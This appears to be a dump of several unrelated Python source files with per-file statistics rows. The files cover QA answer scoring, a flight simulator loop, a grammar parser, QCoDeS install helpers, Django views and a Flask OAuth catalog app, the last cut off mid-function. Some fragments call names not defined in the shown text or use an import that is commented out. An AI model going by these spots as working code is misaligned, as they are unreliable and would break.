relationwise = aprf_relationwise(telemetry)
macro = sum([val[0] for _, val in relationwise.items()])
macro = macro / len(relationwise)
return micro, macro, relationwise, incorrect
def read_results(ground_truth_file, predicted_answers_file):
"""Read results and ground truth and return data structure with stats."""
with codecs.getreader("utf-8")(tf.gfile.GFile(ground_truth_file,
"r")) as read:
data_ = {}
for line in read:
item = json.loads(line.strip())
if isinstance(item["relation"], dict):
relation = item["relation"]["wikidata_id"]
elif isinstance(item["relation"], list):
relation = (
item["relation"][0]["wikidata_id"] + "_" +
item["relation"][1]["wikidata_id"])
data_[item["id"]] = [relation, item["subject"]["wikidata_id"]]
if "is_impossible" in item and item["is_impossible"]:
continue
if item["object"] is None:
continue
if isinstance(item["object"]["mention"], dict):
data_[item["id"]] += [item["object"]["mention"]["text"]]
if "name" in item["object"]:
data_[item["id"]] += [item["object"]["name"]]
if "aliases" in item["object"]:
data_[item["id"]] += item["object"]["aliases"].keys()
with codecs.getreader("utf-8")(tf.gfile.GFile(predicted_answers_file,
"r")) as fin:
predictions = json.load(fin)
telemetry, incorrect = [], []
n = 0
for key in data_:
if key not in predictions:
continue
g = data_[key][2:]
a = predictions[key]
m = data_[key][:2]
stats = score(g, a)
telemetry.append([m[0], m[1], g, a, stats])
if stats[0] == 0. and stats[3] > 0.:
incorrect.append(key)
n += 1
return telemetry, incorrect
def aprf_relationwise(g):
"""Returns precision, recall and F score for each relation."""
rel_to_stats = collections.defaultdict(list)
for item in g:
rel_to_stats[item[0]].append(item)
rel_to_scores = {}
for rel, stats in rel_to_stats.items():
rel_to_scores[rel] = [aprf(stats), len(stats)]
return rel_to_scores
def aprf(g):
"""Returns precision, recall and F of the given statistics."""
tp, _, sys_pos, real_pos = sum([x[-1] for x in g])
if tp == 0:
p = r = f = 0.0
else:
p = tp / float(sys_pos) if sys_pos > 0 else 0.
r = tp / float(real_pos) if real_pos > 0 else 0.
f = 2 * p * r / (p + r)
return np.asarray([p, r, f])
def score(gold, answer):
"""Compares answer to ground truth to return TP / FP stats."""
if gold:
gold = set([simplify(g) for g in gold])
answer = simplify(answer)
result = np.zeros(4)
if gold:
result[3] += 1
if answer in gold:
result[0] += 1
else:
if not answer:
result[1] += 1
if answer:
result[2] += 1
return result
def strip_accents_and_punct(text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
if char in PUNCTUATION:
continue
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def simplify(answer):
"""Pre-process answer string."""
toks = []
articles = {"the", "a", "an", "and", ""}
for t in answer.strip().lower().split():
tok = strip_accents_and_punct(t)
if tok not in articles:
toks.append(tok)
return "".join(toks)
def rare_relation_scores(relationwise, relation2counts):
"""Print statistics of rare relations for different thresholds."""
for thresh in [5, 100, 500, 1000]:
freq_stats, freq_total = np.array([0., 0., 0.]), 0
rare_stats, rare_total = np.array([0., 0., 0.]), 0
for relation, (stats, _) in relationwise.items():
if relation2counts.get(relation, 0) < thresh:
rare_stats += stats
rare_total += 1
else:
freq_stats += stats
freq_total += 1
rare_stats /= rare_total
freq_stats /= freq_total
print(
"Threshold =", thresh, "rare", rare_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(rare_stats[0], rare_stats[1], rare_stats[2]), "freq", freq_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(freq_stats[0], freq_stats[1], freq_stats[2]))
def main(_):
eval_type = "hotpot"
if eval_type == "hotpot":
test_hotpot_eval()  # assumed to be defined elsewhere; it is not present in this file
else:
micro, macro, rwise, _ = compute_scores(FLAGS.ground_truth_file,
FLAGS.predicted_answers_file)
print("Micro", micro)
print("Macro", macro)
if FLAGS.relation_counts_file is not None:
r2c = json.load(tf.gfile.Open(FLAGS.relation_counts_file))
rare_relation_scores(rwise, r2c)
if __name__ == "__main__":
app.run(main)
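# Usage sketch: a hedged demonstration of the self-contained answer-scoring
# helpers above; the example strings are invented and this function is never
# called by the module itself.
def _demo_scoring():
    prediction = "The Eiffel Tower."
    ground_truths = ["Eiffel Tower", "Tour Eiffel"]
    em = metric_max_over_ground_truths(exact_match_score, prediction, ground_truths)
    f1 = metric_max_over_ground_truths(f1_score, prediction, ground_truths)
    print("normalized:", normalize_answer(prediction))  # -> "eiffel tower"
    print("EM:", em, "F1:", f1)  # EM is True and F1 is 1.0 for this pair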
| 33.196891
| 80
| 0.643827
| 2,617
| 19,221
| 4.542224
| 0.155522
| 0.011441
| 0.01346
| 0.006057
| 0.38336
| 0.332885
| 0.309414
| 0.29057
| 0.2549
| 0.248002
| 0
| 0.015265
| 0.229749
| 19,221
| 578
| 81
| 33.254325
| 0.787639
| 0.150773
| 0
| 0.241706
| 0
| 0
| 0.09943
| 0.010346
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059242
| false
| 0
| 0.033175
| 0.007109
| 0.158768
| 0.009479
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139b6ad51a7b83cb108f4b1bb43a2ce22b27cc6e
| 2,377
|
py
|
Python
|
AirplaneLQR/chap4LQR/mavsim_chap4.py
|
eyler94/ee674AirplaneSim
|
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
|
[
"MIT"
] | 1
|
2020-06-07T00:14:42.000Z
|
2020-06-07T00:14:42.000Z
|
AirplaneLQR/chap4LQR/mavsim_chap4.py
|
eyler94/ee674AirplaneSim
|
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
|
[
"MIT"
] | null | null | null |
AirplaneLQR/chap4LQR/mavsim_chap4.py
|
eyler94/ee674AirplaneSim
|
3ba2c6e685c2688a7f372475a7cd1f55f583d10e
|
[
"MIT"
] | 1
|
2019-06-24T22:10:48.000Z
|
2019-06-24T22:10:48.000Z
|
"""
mavsimPy
- Chapter 4 assignment for Beard & McLain, PUP, 2012
- Update history:
12/27/2018 - RWB
1/17/2019 - RWB
"""
import sys
sys.path.append('..')
import numpy as np
import parameters.simulation_parameters as SIM
from chap2.mav_viewer import mav_viewer
# from chap2.video_writer import video_writer
from chap3.data_viewer import data_viewer
from chap4.mav_dynamics import mav_dynamics
from chap4.wind_simulation import wind_simulation
from time import sleep
# initialize the visualization
VIDEO = False # True==write video, False==don't write video
mav_view = mav_viewer() # initialize the mav viewer
data_view = data_viewer() # initialize view of data plots
if VIDEO:  # requires the chap2.video_writer import above to be uncommented
video = video_writer(video_name="chap4_video.avi",
bounding_box=(0, 0, 1000, 1000),
output_rate=SIM.ts_video)
# initialize elements of the architecture
wind = wind_simulation(SIM.ts_simulation)
mav = mav_dynamics(SIM.ts_simulation)
# initialize the simulation time
sim_time = SIM.start_time
# main simulation loop
# sleep(5)
print("Press Command-Q to exit...")
while sim_time < SIM.end_time:
#-------set control surfaces-------------
if sim_time < 25:
delta_e = -0.1
delta_t = 1.0 # 0.5
delta_a = 0.0 # 0.0
delta_r = 0.0 # 0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
else:
delta_e = -0.3
delta_t = 1.0#0.5
delta_a = 0.01#0.0
delta_r = 0.00025#0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
#-------physical system-------------
current_wind = wind.update() # get the new wind vector
# print("current wind: ", current_wind)
mav.update_state(delta, current_wind) # propagate the MAV dynamics
#-------update viewer-------------
mav_view.update(mav.msg_true_state) # plot body of MAV
data_view.update(mav.msg_true_state, # true states
mav.msg_true_state, # estimated states
mav.msg_true_state, # commanded states
SIM.ts_simulation)
if VIDEO:
video.update(sim_time)
#-------increment time-------------
sim_time += SIM.ts_simulation
if VIDEO:
video.close()
| 30.87013
| 106
| 0.63862
| 340
| 2,377
| 4.276471
| 0.323529
| 0.01238
| 0.041265
| 0.041265
| 0.23934
| 0.198074
| 0.163686
| 0.121045
| 0.121045
| 0.097662
| 0
| 0.041989
| 0.238536
| 2,377
| 76
| 107
| 31.276316
| 0.761326
| 0.339083
| 0
| 0.2
| 0
| 0
| 0.028068
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.177778
| 0
| 0.177778
| 0.022222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139ccafc558ec94667dba3f86f2f3f760f5cf3e5
| 11,176
|
py
|
Python
|
nelly/parser.py
|
shawcx/nelly
|
8075b92e20064a117f9ab5a6d8ad261d21234111
|
[
"MIT"
] | null | null | null |
nelly/parser.py
|
shawcx/nelly
|
8075b92e20064a117f9ab5a6d8ad261d21234111
|
[
"MIT"
] | null | null | null |
nelly/parser.py
|
shawcx/nelly
|
8075b92e20064a117f9ab5a6d8ad261d21234111
|
[
"MIT"
] | null | null | null |
#
# (c) 2008-2020 Matthew Shaw
#
import sys
import os
import re
import logging
import nelly
from .scanner import Scanner
from .program import Program
from .types import *
class Parser(object):
def __init__(self, include_dirs=[]):
self.include_dirs = include_dirs + [ os.path.join(nelly.root, 'grammars') ]
self.pwd = []
# setup the scanner based on the regular expressions
self.scanner = Scanner(os.path.join(nelly.root, 'rules.lex'))
# container for the compiled program
self.program = Program()
self.tokens_stack = []
self.groups_stack = []
self.group_stack = []
self.groups = None
self.group = None
def Parse(self, grammarFile):
grammar = grammarFile.read()
self.pwd.append(os.path.dirname(grammarFile.name))
logging.debug('Parsing %s (%d bytes)', grammarFile.name, len(grammar))
self.tokens = self.scanner.Scan(grammar)
# keep a reference to the tokens for when included files are parsed
self.tokens_stack.append(self.tokens)
# iterate over all the tokens
while self.tokens:
(token,value,line,col) = self.tokens.Next()
# handle all the top-level tokens
if 'nonterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.NONTERMINAL, value)
elif 'varterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.VARTERMINAL, value)
elif 'include' == token:
self._include()
elif 'start_python_code' == token:
if r'<%pre' == value:
self.program.preamble.append(self._python_code('pre'))
elif r'<%post' == value:
self.program.postscript.append(self._python_code('post'))
else:
raise nelly.error('Please specify pre or post in code section')
elif 'start_comment' == token:
self._comment()
else:
raise nelly.error('Unhandled %s %s at %d:%d', token, repr(value), line, col)
self.tokens_stack.pop()
return self.program
def _nonterminal(self, _type, name):
# create a new container and add it to the program
nonterminal = Nonterminal(_type, name)
self.program.nonterminals[name] = nonterminal
(token,value,line,col) = self.tokens.Next()
# parse any optional arguments for the non-terminal
if 'lparen' == token:
while True:
(token,value,line,col) = self.tokens.Next()
if 'rparen' == token:
break
elif 'comma' == token:
continue
elif 'option' == token:
nonterminal.options.append(value)
if value == 'start':
self.program.start.append(name)
elif 'decorator' == token:
nonterminal.decorators.append(value[1:])
else:
raise nelly.error('Unknown option: %s %s', token, value)
(token,value,line,col) = self.tokens.Next()
if 'colon' != token:
raise nelly.error('Parse error, missing colon at line %d, column %d', line, col)
# parse zero or more expressions until a semicolon is found
self._expressions('pipe', 'semicolon', nonterminal)
def _expressions(self, delimiter, sentinel, nonterminal):
(token,value,line,col) = self.tokens.Peek()
expression = Expression((line,col))
while self.tokens:
(token,value,line,col) = self.tokens.Next()
if sentinel == token:
nonterminal.expressions.append(expression)
break
elif delimiter == token:
nonterminal.expressions.append(expression)
expression = Expression((line,col))
elif 'lparen' == token:
anonterminal = Nonterminal(Types.ANONYMOUS)
expression.Statement(Types.ANONYMOUS, anonterminal)
self._expressions('pipe', 'rparen', anonterminal)
elif token in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
quote = self._quote()
expression.Statement(Types.TERMINAL, quote)
elif token in ['start_single_bytes', 'start_double_bytes', 'start_triple_bytes']:
byte_quote = self._quote()
expression.Statement(Types.TERMINAL, byte_quote)
elif 'nonterminal' == token:
expression.Statement(Types.NONTERMINAL, value)
elif 'varterminal' == token:
expression.Statement(Types.VARTERMINAL, value)
elif 'backref' == token:
expression.Statement(Types.BACKREFERENCE, value)
elif 'function' == token:
functerminal = Nonterminal(Types.ANONYMOUS)
self._expressions('comma', 'rparen', functerminal)
expression.Statement(Types.FUNCTION, value[1:], functerminal)
elif 'reference' == token:
expression.Statement(Types.REFERENCE, value[1:])
elif 'constant' == token:
expression.Statement(Types.TERMINAL, value)
elif 'start_python_code' == token:
expression.code = self._python_code(nonterminal.name)
elif 'lbracket' == token:
try:
expression.Operation(Types.SLICE, self._slice())
except IndexError:
raise nelly.error('Applying slice to nothing at line %d, column %d', line, col)
elif 'lcurley' == token:
try:
expression.Operation(Types.RANGE, self._range())
except IndexError:
raise nelly.error('Applying range to nothing at line %d, column %d', line, col)
elif 'langle' == token:
expression.Weight(self._weight())
elif 'empty' == token:
pass
else:
raise nelly.error('Unhandled token "%s" at line %d, column %d', token, line, col)
def _quote(self):
# this will always be the quoted value
(token,value,line,col) = self.tokens.Next()
# this will always be the terminal quote
self.tokens.Next()
return value
#
# Slice a string
#
def _slice(self):
front = None
back = None
start = False
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
front = value
start = True
(token,value,line,col) = self.tokens.Next()
if 'rbracket' == token:
if False == start:
raise nelly.error('Empty slice at line %d, column %d', line, col)
return (front,front+1)
elif 'colon' != token:
raise nelly.error('Missing colon at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
back = value
(token,value,line,col) = self.tokens.Next()
elif 'rbracket' != token:
raise nelly.error('Missing ] at line %d, column %d', line, col)
return (front,back)
#
# Repeat a range
#
def _range(self):
lower = 0
upper = 0
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing range at line %d, column %d', line, col)
lower = value
upper = value
(token,value,line,col) = self.tokens.Next()
if 'rcurley' == token:
return (lower,upper)
elif 'comma' != token:
raise nelly.error('Missing comma at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'constant' == token:
upper = value
else:
raise nelly.error('Missing range at line %d, column %d', line, col)
(token,value,line,col) = self.tokens.Next()
if 'rcurley' != token:
raise nelly.error('Missing } at line %d, column %d', line, col)
if lower > upper:
lower,upper = upper,lower
return (lower,upper)
def _weight(self):
(token,value,line,col) = self.tokens.Next()
if 'constant' != token:
raise nelly.error('Missing weight at line %d, column %d', line, col)
(token,ignore,line,col) = self.tokens.Next()
if 'rangle' != token:
raise nelly.error('Missing > at %d, column %d', line, col)
return value
#
# Compile the Python into a code object
#
def _python_code(self, name):
(token,value,line,col) = self.tokens.Next()
values = [s for s in value.split('\n') if s.strip()] or ['']
# save the whitespace of the first line
ws = re.compile(r'\s*').match(values[0]).group()
# check indentation
if [s for s in values if not s.startswith(ws)]:
raise nelly.error('Bad indentation in code block at line %d, column %d', line, col)
# strip and rejoin the code
codeblock = '\n'.join(s[len(ws):] for s in values)
# eat the end_python_code token
self.tokens.Next()
try:
return compile(codeblock, '<'+name+'>', 'exec')
except SyntaxError as e:
raise nelly.error('%d: %s: %s', e.lineno, e.msg, repr(e.text))
#
# Include other BNF files
#
def _include(self):
(token,value,line,col) = self.tokens.Next()
# file names are quoted
if token not in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
raise nelly.error('quoted file path expected')
# get the quoted value
path = self._quote()
# try opening the file in each include directory, ignore errors
content = None
for include_dir in self.pwd[-1:] + self.include_dirs:
try:
fullpath = os.path.join(include_dir, path)
content = open(fullpath, 'r')
logging.debug('Including file %s', repr(fullpath))
break
except:
continue
# if no file was found, throw an error
if None == content:
raise nelly.error('Could not load file %s', repr(path))
# ignore empty file
if not content:
return
# compile it inline
self.Parse(content)
self.pwd.pop()
# restore the current tokens
self.tokens = self.tokens_stack[-1]
#
# Multi-line comments
#
def _comment(self):
# consume and disregard the tokens
while True:
(token,value,line,col) = self.tokens.Next()
if 'start_comment' == token:
self._comment()
if 'end_comment' == token:
return
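# Usage sketch: a hedged example of compiling a grammar with this parser. The
# grammar path is hypothetical; Parse() expects an open file object whose .name
# attribute is used to resolve relative includes.
def _demo_parse(grammar_path='grammars/http.bnf'):
    parser = Parser(include_dirs=['grammars'])
    with open(grammar_path) as grammar_file:
        program = parser.Parse(grammar_file)
    # program.nonterminals maps rule names to their compiled containers
    return program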
| 34.708075
| 99
| 0.54796
| 1,237
| 11,176
| 4.88844
| 0.19806
| 0.042831
| 0.038201
| 0.059038
| 0.382008
| 0.295188
| 0.25831
| 0.221267
| 0.19828
| 0.177939
| 0
| 0.002576
| 0.340104
| 11,176
| 321
| 100
| 34.816199
| 0.817356
| 0.083482
| 0
| 0.308036
| 0
| 0
| 0.125172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049107
| false
| 0.004464
| 0.035714
| 0
| 0.133929
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139d2344b35cd1e7a61819201ca64cbfee2afef8
| 2,363
|
py
|
Python
|
qcodes/utils/installation_info.py
|
zhinst/Qcodes
|
d95798bd08d57bb8cddd460fdb4a5ff25f19215c
|
[
"MIT"
] | 1
|
2020-10-19T08:09:04.000Z
|
2020-10-19T08:09:04.000Z
|
qcodes/utils/installation_info.py
|
M1racleShih/Qcodes
|
c03029a6968e16379155aadc8b083a02e01876a6
|
[
"MIT"
] | 230
|
2020-08-17T06:08:33.000Z
|
2022-03-29T12:06:58.000Z
|
qcodes/utils/installation_info.py
|
nikhartman/Qcodes
|
042c5e25ab9e40b20c316b4055c4842844834d1e
|
[
"MIT"
] | 4
|
2017-12-11T12:13:41.000Z
|
2018-08-01T13:13:04.000Z
|
"""
This module contains helper functions that provide information about how
QCoDeS is installed and about what other packages are installed along with
QCoDeS
"""
import sys
from typing import Dict, List, Optional
import subprocess
import json
import logging
import requirements
if sys.version_info >= (3, 8):
from importlib.metadata import distribution, version, PackageNotFoundError
else:
# 3.7 and earlier
from importlib_metadata import distribution, version, PackageNotFoundError
import qcodes
log = logging.getLogger(__name__)
def is_qcodes_installed_editably() -> Optional[bool]:
"""
Try to ask pip whether QCoDeS is installed in editable mode and return
the answer as a boolean. Returns None if pip somehow did not respond as
expected.
"""
answer: Optional[bool]
try:
pipproc = subprocess.run(['python', '-m', 'pip', 'list', '-e', '--no-index',
'--format=json'],
check=True,
stdout=subprocess.PIPE)
e_pkgs = json.loads(pipproc.stdout.decode('utf-8'))
answer = any([d["name"] == 'qcodes' for d in e_pkgs])
except Exception as e: # we actually do want a catch-all here
log.warning(f'{type(e)}: {str(e)}')
answer = None
return answer
def get_qcodes_version() -> str:
"""
Get the version of the currently installed QCoDeS
"""
return qcodes.version.__version__
def get_qcodes_requirements() -> List[str]:
"""
Return a list of the names of the packages that QCoDeS requires
"""
qc_pkg = distribution('qcodes').requires
if qc_pkg is None:
return []
package_names = [list(requirements.parse(req))[0].name for req in qc_pkg]
return package_names
def get_qcodes_requirements_versions() -> Dict[str, str]:
"""
Return a dictionary of the currently installed versions of the packages
that QCoDeS requires. The dict maps package name to version string.
If an (optional) dependency is not installed the name maps to "Not installed".
"""
req_names = get_qcodes_requirements()
req_versions = {}
for req in req_names:
try:
req_versions[req] = version(req)
except PackageNotFoundError:
req_versions[req] = "Not installed"
return req_versions
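# Usage sketch: a hedged example of reporting the installation state; it assumes
# QCoDeS itself is importable in the current environment.
if __name__ == '__main__':
    print('QCoDeS version:', get_qcodes_version())
    print('Editable install:', is_qcodes_installed_editably())
    for pkg, pkg_version in get_qcodes_requirements_versions().items():
        print(pkg, '->', pkg_version)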
| 28.130952
| 84
| 0.656792
| 300
| 2,363
| 5.056667
| 0.396667
| 0.01648
| 0.023731
| 0.035597
| 0.127884
| 0.127884
| 0.087014
| 0
| 0
| 0
| 0
| 0.003399
| 0.253068
| 2,363
| 83
| 85
| 28.46988
| 0.856091
| 0.292425
| 0
| 0.047619
| 0
| 0
| 0.058601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.214286
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139d2693f9221f951071ee2118de0f027b954129
| 1,177
|
py
|
Python
|
documents/views.py
|
brandonrobertz/foia-pdf-processing-system
|
025516b5e2234df16741237c4208cd484f577370
|
[
"MIT"
] | null | null | null |
documents/views.py
|
brandonrobertz/foia-pdf-processing-system
|
025516b5e2234df16741237c4208cd484f577370
|
[
"MIT"
] | null | null | null |
documents/views.py
|
brandonrobertz/foia-pdf-processing-system
|
025516b5e2234df16741237c4208cd484f577370
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import JsonResponse
from .models import FieldCategory
def fieldname_values(request):
if request.method == "GET":
fieldname = request.GET['fieldname']
query = request.GET.get('q')
        q_kwargs = dict(
fieldname=fieldname,
)
if query:
q_kwargs['value__icontains'] = query
fc = FieldCategory.objects.filter(
**q_kwargs
).order_by("-count").values('value')
return JsonResponse(list(fc), safe=False)
elif request.method == "POST":
fieldname = request.POST['fieldname']
value = request.POST['value']
fc, created = FieldCategory.objects.get_or_create(
fieldname=fieldname,
value=value
)
return JsonResponse({'status': 'ok'})
def fieldname_value_count(request):
# just let it explode if people don't POST properly
fieldname = request.POST['fieldname']
value = request.POST['value']
fc = FieldCategory.objects.get(
fieldname=fieldname,
value=value
)
fc.count += 1
fc.save()
return JsonResponse({'status': 'ok'})
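A hedged sketch of exercising these views with Django's test client. The URL path is an assumption (the project's urls.py is not shown), and the field names are invented:
from django.test import Client

client = Client()
# GET: list known values for a fieldname, optionally filtered by a substring
resp = client.get('/fieldname-values/', {'fieldname': 'agency', 'q': 'pol'})  # hypothetical route
print(resp.json())   # e.g. [{'value': 'Police Department'}, ...]
# POST: record a value for a fieldname (get_or_create in the view above)
resp = client.post('/fieldname-values/', {'fieldname': 'agency', 'value': 'Police Department'})
print(resp.json())   # {'status': 'ok'}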
| 28.02381
| 58
| 0.614274
| 127
| 1,177
| 5.606299
| 0.385827
| 0.098315
| 0.061798
| 0.081461
| 0.146067
| 0.146067
| 0.146067
| 0.146067
| 0.146067
| 0
| 0
| 0.001164
| 0.270178
| 1,177
| 41
| 59
| 28.707317
| 0.827707
| 0.041631
| 0
| 0.323529
| 0
| 0
| 0.078153
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.088235
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
139ed09f5c5b42cbc50f76d8cc6ce28401b30b04
| 12,850
|
py
|
Python
|
application.py
|
nicholsont/catalog_app
|
011e4c35401aa1128a4cf1ca99dd808da7a759e6
|
[
"Unlicense"
] | null | null | null |
application.py
|
nicholsont/catalog_app
|
011e4c35401aa1128a4cf1ca99dd808da7a759e6
|
[
"Unlicense"
] | null | null | null |
application.py
|
nicholsont/catalog_app
|
011e4c35401aa1128a4cf1ca99dd808da7a759e6
|
[
"Unlicense"
] | null | null | null |
from flask import Flask, render_template, request, redirect, jsonify, g
from flask import url_for, flash, make_response
from flask import session as login_session
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from models import Base, Category, Item, User
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
import requests
app = Flask(__name__)
# Retrieve client IDs and secrets from the JSON files
CLIENT_ID = json.loads(open('client_secrets.json', 'r')
.read())['web']['client_id']
APP_ID = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_id']
APP_SECRET = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_secret']
# Connect to Database and create database session
engine = create_engine('sqlite:///catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Login handler
@app.route('/login')
def showLogin():
"""JSON API to view entire catalog Information."""
return render_template('login.html')
# Third Party Oauth callback
@app.route('/oauth/<provider>', methods=['POST'])
def oauthLogin(provider):
"""
    Process an OAuth login for the given provider.
    params: (string) oauth provider name ('google' or 'facebook')
"""
if provider == 'google':
code = request.data
try:
# Upgrade auth code into credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json',
scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check for valid access token
access_token = credentials.access_token
url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \
'access_token={}'.format(access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Access token error handling
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
            response.headers['Content-Type'] = 'application/json'
return response
# Store access token in session
login_session['provider'] = 'google'
login_session['access_token'] = access_token
login_session['gplus_id'] = credentials.id_token['sub']
# Get user info
userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
params = {'access_token': login_session['access_token'], 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = json.loads(answer.text)
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
elif provider == 'facebook':
access_token = request.data
url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \
'fb_exchange_token&client_id={}&client_secret={}&' \
'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Strip expire tag from access token
access_token = result['access_token']
url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \
'name,id,email,picture'.format(access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Get user info
data = result
login_session['access_token'] = access_token
login_session['provider'] = 'facebook'
login_session['username'] = data['name']
login_session['email'] = data['email']
login_session['picture'] = data['picture']['data']['url']
login_session['facebook_id'] = data['id']
# Checks if user exists in DB
if getUserID(login_session['email']) is not None:
login_session['user_id'] = getUserID(login_session['email'])
else:
createUser(login_session)
login_session['user_id'] = getUserID(login_session['email'])
# Stores token in session
user = session.query(User).filter_by(email=login_session['email']).first()
token = user.generate_auth_token(600)
login_session['token'] = token
output = ''
output += '<h1>Welcome, {}!</h1>'.format(login_session['username'])
output += '<img src="{}" '.format(login_session['picture'])
output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \
'-webkit-border-radius: 150px;-moz-border-radius: 150px;">'
flash('Now logged in as {}'.format(login_session['username']))
return output
def createUser(login_session):
newUser = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(newUser)
session.commit()
def getUserID(email):
try:
user = session.query(User).filter_by(email=email).one()
return user.id
    except Exception:
return None
# Revoke current user's token and reset login_session
@app.route('/logout')
def logout():
if 'provider' in login_session:
if login_session['provider'] == 'google':
del login_session['gplus_id']
if login_session['provider'] == 'facebook':
del login_session['facebook_id']
del login_session['access_token']
del login_session['username']
del login_session['picture']
del login_session['email']
del login_session['token']
flash("You have been successfully logged out.")
return redirect(url_for('showCatalog'))
else:
flash("No user has been logged in.")
return redirect(url_for('showCatalog'))
# JSON APIs to view Category Information.
@app.route('/catalog/JSON')
def catalogJSON():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
return jsonify(Categories=[c.serialize for c in categories],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/JSON')
def catalogCategoryJSON(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
return jsonify(Categories=[itemCategory.serialize],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/<item>/JSON')
def categoryItemJSON(category, item):
itemCategory = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=itemCategory.id).first()
return jsonify(Category=[itemCategory.serialize],
Item=[item.serialize])
# Show all Categories and the latest items
@app.route('/')
@app.route('/catalog')
def showCatalog():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
if 'token' not in login_session:
return render_template('publiccatalog.html',
categories=categories, items=items)
else:
return render_template('catalog.html',
categories=categories, items=items)
# Show Items in a category item
@app.route('/catalog/<category>/')
def showCatalogCategory(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategory.html',
items=items, category=itemCategory,
categories=categories)
else:
return render_template('category.html', items=items,
category=itemCategory, categories=categories)
# Show an item in a category
@app.route('/catalog/<category>/<item>/')
def showCategoryItem(category, item):
category = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=category.id).first()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategoryitem.html',
item=item, category=category,
categories=categories)
